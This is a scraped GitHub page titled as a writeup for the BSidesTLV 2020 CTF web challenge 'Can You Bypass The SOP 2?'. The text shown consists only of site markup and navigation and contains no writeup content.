CTFtime.org / BSidesTLV 2020 CTF / Can You Bypass The SOP 2? / Writeup

<!DOCTYPE html> <html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">

<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" />
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" />
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" />

<title>CTF-Writeups/BSidesTLV-2020/web/Can You Bypass The SOP 2 at master · trott4425/CTF-Writeups · GitHub</title>

<meta name="hovercard-subject-tag" content="repository:276119642" data-turbo-transient>

<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY">

<meta name="user-login" content="">



<meta name="viewport" content="width=device-width">

  <meta name="description" content="Writeups for any CTF Challenges that I found interesting - CTF-Writeups/BSidesTLV-2020/web/Can You Bypass The SOP 2 at master · trott4425/CTF-Writeups">
  <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub">
<link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub">
<meta property="fb:app_id" content="1401488693436528">
<meta name="apple-itunes-app" content="app-id=1477376905" />
  <meta name="twitter:image:src" content="https://opengraph.githubassets.com/66848648bc96426616bb7c3701d082ea58df06c32efe29c1517625258d657cb4/trott4425/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF-Writeups/BSidesTLV-2020/web/Can You Bypass The SOP 2 at master · trott4425/CTF-Writeups" /><meta name="twitter:description" content="Writeups for any CTF Challenges that I found interesting - CTF-Writeups/BSidesTLV-2020/web/Can You Bypass The SOP 2 at master · trott4425/CTF-Writeups" />
  <meta property="og:image" content="https://opengraph.githubassets.com/66848648bc96426616bb7c3701d082ea58df06c32efe29c1517625258d657cb4/trott4425/CTF-Writeups" /><meta property="og:image:alt" content="Writeups for any CTF Challenges that I found interesting - CTF-Writeups/BSidesTLV-2020/web/Can You Bypass The SOP 2 at master · trott4425/CTF-Writeups" /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF-Writeups/BSidesTLV-2020/web/Can You Bypass The SOP 2 at master · trott4425/CTF-Writeups" /><meta property="og:url" content="https://github.com/trott4425/CTF-Writeups" /><meta property="og:description" content="Writeups for any CTF Challenges that I found interesting - CTF-Writeups/BSidesTLV-2020/web/Can You Bypass The SOP 2 at master · trott4425/CTF-Writeups" />
  
<link rel="assets" href="https://github.githubassets.com/">


    <meta name="hostname" content="github.com">



    <meta name="expected-hostname" content="github.com">

<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">

    <meta data-hydrostats="publish">

<link rel="canonical" href="https://github.com/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202" data-turbo-transient>

</head>

<div class="position-relative js-header-wrapper ">
  <a href="#start-of-content" class="px-2 py-4 color-bg-accent-emphasis color-fg-on-emphasis show-on-focus js-skip-to-content">Skip to content</a>
  <span data-view-component="true" class="progress-pjax-loader Progress position-fixed width-full">
<span style="width: 0%;" data-view-component="true" class="Progress-item progress-pjax-loader-bar left-0 top-0 color-bg-accent-emphasis"></span>

</span>

        <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script>

    <div class="flex-1">
      <a href="/signup?ref_cta=Sign+up&amp;ref_loc=header+logged+out&amp;ref_page=%2F%3Cuser-name%3E%2F%3Crepo-name%3E%2Ffiles%2Fdisambiguate&amp;source=header-repo"
        class="d-inline-block d-lg-none flex-order-1 f5 no-underline border color-border-default rounded-2 px-2 py-1 color-fg-inherit"
        data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot;:&quot;site header&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="832a87a62be5d2e49287eb79c292f80753aae265df8897f04384f52b4a4bbfab"
      >
        Sign&nbsp;up
      </a>
    </div>

  <div class="flex-1 flex-order-2 text-right">
      <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1">    <span class="Button-content">
  <span class="Button-label"><div class="HeaderMenu-toggle-bar rounded my-1"></div>
        <div class="HeaderMenu-toggle-bar rounded my-1"></div>
        <div class="HeaderMenu-toggle-bar rounded my-1"></div></span>
</span>

</button>
</div> </div>

<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0">
  <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0">
      <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global">
        <ul class="d-lg-flex list-style-none">
            <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item">
  <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false">
    Product
    <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1">
<path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path>

</svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide"> <ul class="list-style-none f5 px-lg-4 border-lg-right mb-4 mb-lg-0 pr-lg-7">

          <li>

</a></li>

          <li>

</a></li>

          <li>

</a></li>

          <li>

</a></li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center pb-lg-3" data-analytics-event="{"category":"Header dropdown (logged out), Product","action":"click to go to Copilot","label":"ref_cta:Copilot;"}" href="/features/copilot"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path> </svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>

</a></li>

          <li>

</a></li>

          <li>

</a></li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center" data-analytics-event="{"category":"Header dropdown (logged out), Product","action":"click to go to Discussions","label":"ref_cta:Discussions;"}" href="/features/discussions"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path> </svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>

</a></li>

      </ul>
      <ul class="list-style-none f5 px-lg-4">
          <li class="h4 color-fg-default my-1">Explore</li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"category":"Header dropdown (logged out), Product","action":"click to go to All features","label":"ref_cta:All features;"}" href="/features"> All features

</a></li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" target="_blank" data-analytics-event="{"category":"Header dropdown (logged out), Product","action":"click to go to Documentation","label":"ref_cta:Documentation;"}" href="https://docs.github.com"> Documentation

<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle">
<path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path>

</svg> </a></li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" target="_blank" data-analytics-event="{"category":"Header dropdown (logged out), Product","action":"click to go to GitHub Skills","label":"ref_cta:GitHub Skills;"}" href="https://skills.github.com/"> GitHub Skills

<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle">
<path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path>

</svg> </a></li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" target="_blank" data-analytics-event="{"category":"Header dropdown (logged out), Product","action":"click to go to Blog","label":"ref_cta:Blog;"}" href="https://github.blog"> Blog

<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle">
<path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path>

</svg> </a></li>

      </ul>
  </div>

</li>

            <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item">
  <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false">
    Solutions
    <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1">
<path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path>

</svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <ul class="list-style-none f5 border-bottom pb-3 mb-3"> <li class="h4 color-fg-default my-1">For</li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"category":"Header dropdown (logged out), Solutions","action":"click to go to Enterprise","label":"ref_cta:Enterprise;"}" href="/enterprise"> Enterprise

</a></li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"category":"Header dropdown (logged out), Solutions","action":"click to go to Teams","label":"ref_cta:Teams;"}" href="/team"> Teams

</a></li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"category":"Header dropdown (logged out), Solutions","action":"click to go to Startups","label":"ref_cta:Startups;"}" href="/enterprise/startups"> Startups

</a></li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" target="_blank" data-analytics-event="{"category":"Header dropdown (logged out), Solutions","action":"click to go to Education","label":"ref_cta:Education;"}" href="https://education.github.com"> Education

<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle">
<path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path>

</svg> </a></li>

      </ul>
      <ul class="list-style-none f5 border-bottom pb-3 mb-3">
          <li class="h4 color-fg-default my-1">By Solution</li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"category":"Header dropdown (logged out), Solutions","action":"click to go to CI/CD & Automation","label":"ref_cta:CI/CD & Automation;"}" href="/solutions/ci-cd/"> CI/CD & Automation

</a></li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" target="_blank" data-analytics-event="{"category":"Header dropdown (logged out), Solutions","action":"click to go to DevOps","label":"ref_cta:DevOps;"}" href="https://resources.github.com/devops/"> DevOps

<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle">
<path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path>

</svg> </a></li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" target="_blank" data-analytics-event="{"category":"Header dropdown (logged out), Solutions","action":"click to go to DevSecOps","label":"ref_cta:DevSecOps;"}" href="https://resources.github.com/devops/fundamentals/devsecops/"> DevSecOps

<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle">
<path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path>

</svg> </a></li>

      </ul>
      <ul class="list-style-none f5 ">
          <li class="h4 color-fg-default my-1">Case Studies</li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"category":"Header dropdown (logged out), Solutions","action":"click to go to Customer Stories","label":"ref_cta:Customer Stories;"}" href="/customer-stories"> Customer Stories

</a></li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" target="_blank" data-analytics-event="{"category":"Header dropdown (logged out), Solutions","action":"click to go to Resources","label":"ref_cta:Resources;"}" href="https://resources.github.com/"> Resources

<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle">
<path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path>

</svg> </a></li>

      </ul>
  </div>

</li>

            <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item">
  <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false">
    Open Source
    <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1">
<path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path>

          <li>

  <div>
    <div class="color-fg-default h4">GitHub Sponsors</div>
    Fund open source developers
  </div>

</a></li>

      </ul>
      <ul class="list-style-none f5 border-bottom pb-3 mb-3">

          <li>

  <div>
    <div class="color-fg-default h4">The ReadME Project</div>
    GitHub community articles
  </div>

</a></li>

      </ul>
      <ul class="list-style-none f5 ">
          <li class="h4 color-fg-default my-1">Repositories</li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"category":"Header dropdown (logged out), Open Source","action":"click to go to Topics","label":"ref_cta:Topics;"}" href="/topics"> Topics

</a></li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"category":"Header dropdown (logged out), Open Source","action":"click to go to Trending","label":"ref_cta:Trending;"}" href="/trending"> Trending

</a></li>

          <li>

<a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"category":"Header dropdown (logged out), Open Source","action":"click to go to Collections","label":"ref_cta:Collections;"}" href="/collections"> Collections

</a></li>

      </ul>
  </div>

</li>

            <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item">
<a class="HeaderMenu-link no-underline px-0 px-lg-2 py-3 py-lg-2 d-block d-lg-inline-block" data-analytics-event="{&quot;category&quot;:&quot;Header menu top item (logged out)&quot;,&quot;action&quot;:&quot;click to go to Pricing&quot;,&quot;label&quot;:&quot;ref_cta:Pricing;&quot;}" href="/pricing">Pricing</a>

</li>

        </ul>
      </nav>

    <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left">
        <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">

<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"

<div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="276119642" data-scoped-search-url="/trott4425/CTF-Writeups/search" data-owner-scoped-search-url="/users/trott4425/search" data-unscoped-search-url="/search" data-turbo="false" action="/trott4425/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q"

      placeholder="Search"
      data-unscoped-placeholder="Search GitHub"
      data-scoped-placeholder="Search"
      autocapitalize="off"
      role="combobox"
      aria-haspopup="listbox"
      aria-expanded="false"
      aria-autocomplete="list"
      aria-controls="jump-to-results"
      aria-label="Search"
      data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations"
      spellcheck="false"
      autocomplete="off"
    >
    <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="kH8TYBpQOXThrdXzyWZqB/cmiyu+22atx4702GE+bjFg25fYM973DZusTLshJJhYFPer2uLyLFjqBFtp0BKO7A==" />
    <input type="hidden" class="js-site-search-type-field" name="type" >
        <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>


      <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">

<img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28">

<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target">
</div>

<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search">
  <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository">
    In this repository
  </span>
  <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub">
    All GitHub
  </span>
  <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span>
</div>

<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump">
  Jump to
  <span class="d-inline-block ml-1 v-align-middle">↵</span>
</div>

</a> </li>

</ul>

<ul class="d-none js-jump-to-no-results-template-container"> <li class="d-flex flex-justify-center flex-items-center f5 d-none js-jump-to-suggestion p-2"> <span class="color-fg-muted">No suggested jump to results</span> </li> </ul>

<img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28">

<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target">
</div>

<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search">
  <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository">
    In this repository
  </span>
  <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub">
    All GitHub
  </span>
  <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span>
</div>

<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump">
  Jump to
  <span class="d-inline-block ml-1 v-align-middle">↵</span>
</div>

</a> </li>

<img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28">

<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target">
</div>

<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search">
  <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this user">
    In this user
  </span>
  <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub">
    All GitHub
  </span>
  <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span>
</div>

